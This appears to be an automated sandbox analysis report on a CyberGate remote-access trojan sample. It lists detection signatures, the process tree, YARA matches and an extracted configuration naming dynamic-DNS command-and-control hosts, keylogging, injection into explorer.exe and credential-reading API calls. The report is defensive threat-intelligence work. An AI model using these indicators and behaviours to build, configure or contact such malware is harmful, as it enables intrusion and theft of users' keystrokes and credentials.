
Analysis Report dqH3t8JU1x.exe

Overview

General Information

Sample Name: dqH3t8JU1x.exe
Analysis ID: 388215
MD5: 06e21af52a3e3e5173a6a53725b1c217
SHA1: 273760ea9b8cf2b4e60e48ed7ea96ab92bb3fa1d
SHA256: 61c2d5a213f1b68ef98f2800f02697650ccf28eb38ec07635f0bffcdf18a803a
Tags: Cybergate, exe

Detection

CyberGate
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected CyberGate RAT
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to detect virtual machines
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to register a low level keyboard hook
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • dqH3t8JU1x.exe (PID: 6776 cmdline: 'C:\Users\user\Desktop\dqH3t8JU1x.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
    • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • TEXTURAFIVEM.exe (PID: 6984 cmdline: 'C:\Windows\install\TEXTURAFIVEM.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
        • explorer.exe (PID: 2200 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • TEXTURAFIVEM.exe (PID: 5432 cmdline: 'C:\Windows\install\TEXTURAFIVEM.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
            • WerFault.exe (PID: 6740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • TEXTURAFIVEM.exe (PID: 7096 cmdline: 'C:\Windows\install\TEXTURAFIVEM.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
        • explorer.exe (PID: 1768 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • WerFault.exe (PID: 5856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 1104 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • TEXTURAFIVEM.exe (PID: 4024 cmdline: 'C:\Windows\install\TEXTURAFIVEM.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
        • explorer.exe (PID: 4908 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • WerFault.exe (PID: 5968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1112 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • explorer.exe (PID: 5908 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • WerFault.exe (PID: 6872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 1104 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: CyberGate

{"C2 list": ["eduzao.ddns.net:7000", "eduzao.ddns.net:2020", "eduzao.ddns.net:2200", "eduzao.ddns.net:4400"], "Password": "123", "InstallFlag": "TRUE", "InstallDir": "install", "InstallFileName": "TEXTURAFIVEM.exe", "ActiveXStartup": "{08B0E5JF-4FCB-11CF-AAA5-00401C6XX500}", "REGKeyHKLM": "HKLM", "REGKeyHKCU": "HKCU", "EnableMessageBox": "TRUE", "MessageBoxIcon": "16", "MessageBoxButton": "0", "InstallMessageTitle": "TEXTURAFIVEM", "InstallMessage": "ESSE ARQUIVO NAO PODE SER EXECUTADO", "ActivateKeylogger": "TRUE", "KeyloggerBackspace": "TRUE", "KeyloggerEnableFTP": "FALSE", "FTPAddress": "ftp.server.com", "FTPDirectory": "./logs/", "FTPUserName": "ftp_user", "FTPPort": "21", "FTPInterval": "30", "ProcessInjection": "2", "ProcessNameForInjection": "explorer.exe", "Persistance": "FALSE", "HideFile": "FALSE", "ChangeCreationDate": "FALSE", "Mutex": "***MUTEX***", "MeltFile": "TRUE", "CyberGateVersion": "2.6", "StartupPolicies": "Policies", "USBSpread": "FALSE"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp | Malware_QA_update | VT Research QA uploaded malware - file update.exe | Florian Roth
  • 0x140f8:$s3: BTMemoryLoadLibary: Get DLLEntyPoint failed
  • 0x73fc:$s5: \Internet Explorer\iexplore.exe
  • 0x142a8:$s7: BTMemoryGetProcAddress: DLL doesn't export anything
00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp | Malware_QA_update | VT Research QA uploaded malware - file update.exe | Florian Roth
  • 0x140f8:$s3: BTMemoryLoadLibary: Get DLLEntyPoint failed
  • 0x73fc:$s5: \Internet Explorer\iexplore.exe
  • 0x142a8:$s7: BTMemoryGetProcAddress: DLL doesn't export anything
00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp | JoeSecurity_CyberGate | Yara detected CyberGate RAT | Joe Security
00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp | JoeSecurity_CyberGate | Yara detected CyberGate RAT | Joe Security
00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
20.2.explorer.exe.24010000.6.unpack | Malware_QA_update | VT Research QA uploaded malware - file update.exe | Florian Roth
  • 0x140f8:$s3: BTMemoryLoadLibary: Get DLLEntyPoint failed
  • 0x73fc:$s5: \Internet Explorer\iexplore.exe
  • 0x142a8:$s7: BTMemoryGetProcAddress: DLL doesn't export anything
20.2.explorer.exe.24010000.6.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
25.2.TEXTURAFIVEM.exe.400000.0.unpack | RAT_CyberGate | Detects CyberGate RAT | Kevin Breen <kevin@techanarchy.net>
25.2.TEXTURAFIVEM.exe.400000.0.unpack | JoeSecurity_CyberGate | Yara detected CyberGate RAT | Joe Security
25.2.TEXTURAFIVEM.exe.400000.0.unpack | CyberGate | unknown | Kevin Breen <kevin@techanarchy.net>

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: dqH3t8JU1x.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Windows\install\TEXTURAFIVEM.exe | Avira: detection malicious, Label: WORM/Rebhip.V
Found malware configuration
Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack | Malware Configuration Extractor: CyberGate {"C2 list": ["eduzao.ddns.net:7000", "eduzao.ddns.net:2020", "eduzao.ddns.net:2200", "eduzao.ddns.net:4400"], "Password": "123", "InstallFlag": "TRUE", "InstallDir": "install", "InstallFileName": "TEXTURAFIVEM.exe", "ActiveXStartup": "{08B0E5JF-4FCB-11CF-AAA5-00401C6XX500}", "REGKeyHKLM": "HKLM", "REGKeyHKCU": "HKCU", "EnableMessageBox": "TRUE", "MessageBoxIcon": "16", "MessageBoxButton": "0", "InstallMessageTitle": "TEXTURAFIVEM", "InstallMessage": "ESSE ARQUIVO NAO PODE SER EXECUTADO", "ActivateKeylogger": "TRUE", "KeyloggerBackspace": "TRUE", "KeyloggerEnableFTP": "FALSE", "FTPAddress": "ftp.server.com", "FTPDirectory": "./logs/", "FTPUserName": "ftp_user", "FTPPort": "21", "FTPInterval": "30", "ProcessInjection": "2", "ProcessNameForInjection": "explorer.exe", "Persistance": "FALSE", "HideFile": "FALSE", "ChangeCreationDate": "FALSE", "Mutex": "***MUTEX***", "MeltFile": "TRUE", "CyberGateVersion": "2.6", "StartupPolicies": "Policies", "USBSpread": "FALSE"}
Multi AV Scanner detection for dropped file
Source: C:\Windows\install\TEXTURAFIVEM.exe | ReversingLabs: Detection: 100%
Multi AV Scanner detection for submitted file
Source: dqH3t8JU1x.exe | Virustotal: Detection: 90%
Source: dqH3t8JU1x.exe | ReversingLabs: Detection: 100%
Machine Learning detection for dropped file
Source: C:\Windows\install\TEXTURAFIVEM.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: dqH3t8JU1x.exe | Joe Sandbox ML: detected
Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.Y
Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.Y
Source: 5.0.TEXTURAFIVEM.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.V
Source: 25.0.TEXTURAFIVEM.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.V
Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.Y
Source: 1.0.dqH3t8JU1x.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.V
Source: 4.0.TEXTURAFIVEM.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.V
Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.Y
Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.Y
Source: 9.0.TEXTURAFIVEM.exe.400000.0.unpack | Avira: Label: WORM/Rebhip.V
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Code function: 1_2_00408AD5 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_00408AD5
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Code function: 1_2_00408AF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_00408AF8
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Code function: 1_2_0040930B CredEnumerateA,CryptUnprotectData,1_2_0040930B
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Code function: 1_2_0040930C CredEnumerateA,CryptUnprotectData,1_2_0040930C
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Code function: 1_2_00408E58 RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptUnprotectData,RegEnumValueA,RegCloseKey,1_2_00408E58
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 4_2_00408AD5 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_00408AD5
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 4_2_00408AF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_00408AF8
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 4_2_0040930B CredEnumerateA,CryptUnprotectData,4_2_0040930B
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 4_2_0040930C CredEnumerateA,CryptUnprotectData,4_2_0040930C
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 4_2_00408E58 RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptUnprotectData,RegEnumValueA,RegCloseKey,4_2_00408E58
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 5_2_00408AD5 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00408AD5
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 5_2_00408AF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00408AF8
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 5_2_0040930B CredEnumerateA,CryptUnprotectData,5_2_0040930B
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 5_2_0040930C CredEnumerateA,CryptUnprotectData,5_2_0040930C
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 5_2_00408E58 RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptUnprotectData,RegEnumValueA,RegCloseKey,5_2_00408E58
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 9_2_00408AD5 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,9_2_00408AD5
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 9_2_00408AF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,9_2_00408AF8
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 9_2_0040930B CredEnumerateA,CryptUnprotectData,9_2_0040930B
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 9_2_0040930C CredEnumerateA,CryptUnprotectData,9_2_0040930C
Source: C:\Windows\install\TEXTURAFIVEM.exe | Code function: 9_2_00408E58 RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptUnprotectData,RegEnumValueA,RegCloseKey,9_2_00408E58
Source: dqH3t8JU1x.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
            Source: Binary string: cfgmgr32.pdbLrs source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdbC source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb^r source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: rasman.pdb@r source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: ws2_32.pdbx? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: explorer.pdb source: WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdbA source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: gdiplus.pdbL? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbm source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cryptsp.pdbr? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: userenv.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wimm32.pdbpr7 source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdbfr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb*Rp source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001C.00000003.530712712.00000000031F1000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552533833.0000000000B8E000.00000004.00000001.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdbP?}& source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvfw32.pdbS source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: msasn1.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdbM source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: rasman.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdbi source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdbJr} source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.358325341.0000000007AA0000.00000002.00000001.sdmp
            Source: Binary string: twinapi.pdb source: WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: WINMMBASE.pdbY source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: avicap32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001C.00000003.530737964.00000000031FD000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552584359.0000000000B9A000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.566720629.0000000003279000.00000004.00000001.sdmp
            Source: Binary string: iphlpapi.pdb! source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdb} source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: combase.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wsock32.pdbw source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: pstorec.pdbTr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdbS source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp
            Source: explorer.exe Binary or memory string: autorun.inf
            Source: explorer.exe Binary or memory string: [autorun] ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
            Source: explorer.exe Binary or memory string: [autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp Binary or memory string: [autorun]
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp Binary or memory string: H[autorun]
